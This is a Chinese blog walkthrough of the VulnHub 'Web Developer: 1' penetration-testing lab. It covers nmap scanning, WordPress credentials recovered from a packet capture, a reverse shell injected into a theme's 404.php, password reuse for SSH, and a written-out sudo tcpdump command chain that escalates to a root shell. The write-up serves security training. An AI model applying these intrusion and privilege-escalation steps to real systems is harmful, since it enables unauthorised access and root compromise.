VulnHub-Web Developer: 1 靶场渗透测试

时间:2021.4.10

靶场信息:
地址:https://www.vulnhub.com/entry/web-developer-1,288/
发布日期:2018年11月5日 
目标:得到root权限&找到flag.txt

一、信息收集

1、获取靶机IP地址

nmap -sP 192.168.137.0/24

image-20210410134915160

由探测结果可知,靶机的IP为192.168.137.133

2、扫描开放的端口和服务

nmap -sS -sV -T5 -p- 192.168.137.133

image-20210410135018999

得到开放的端口信息:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

3、网站信息收集

先用dirb爆破一下目录

image-20210410141733548

访问ipdata目录,得到数据包,下载下来,再用wireshark打开

image-20210410141807102

在数据包中找到了用户登录的信息

用户名:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd

image-20210410141934847

然后登录wordpress后台

image-20210410142645869

二、漏洞探测

在修改主题代码处,切换为Twenty Sixteen,在404.php里插入反弹shell的代码

image-20210410143212324

三、漏洞利用

修改保存之后,本地监听6666端口,然后访问 http://192.168.137.133/wp-content/themes/twentysixteen/404.php,即可反弹shell

image-20210410143702953

查看wp-config.php,找到数据库用户和密码

webdeveloper/MasterOfTheUniverse

image-20210410144030378

试试能不能用这个账号登录ssh

image-20210410144356477

四、提权

登录成功后,发现可以利用tcpdump提权

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

image-20210410145042479

本地再监听6666端口,即可获得root权限的shell了

image-20210410145127648

总结

又一次碰到tcpdump提权。

posted @ 2021-04-10 15:02  l2sec  阅读(339)  评论(0编辑  收藏  举报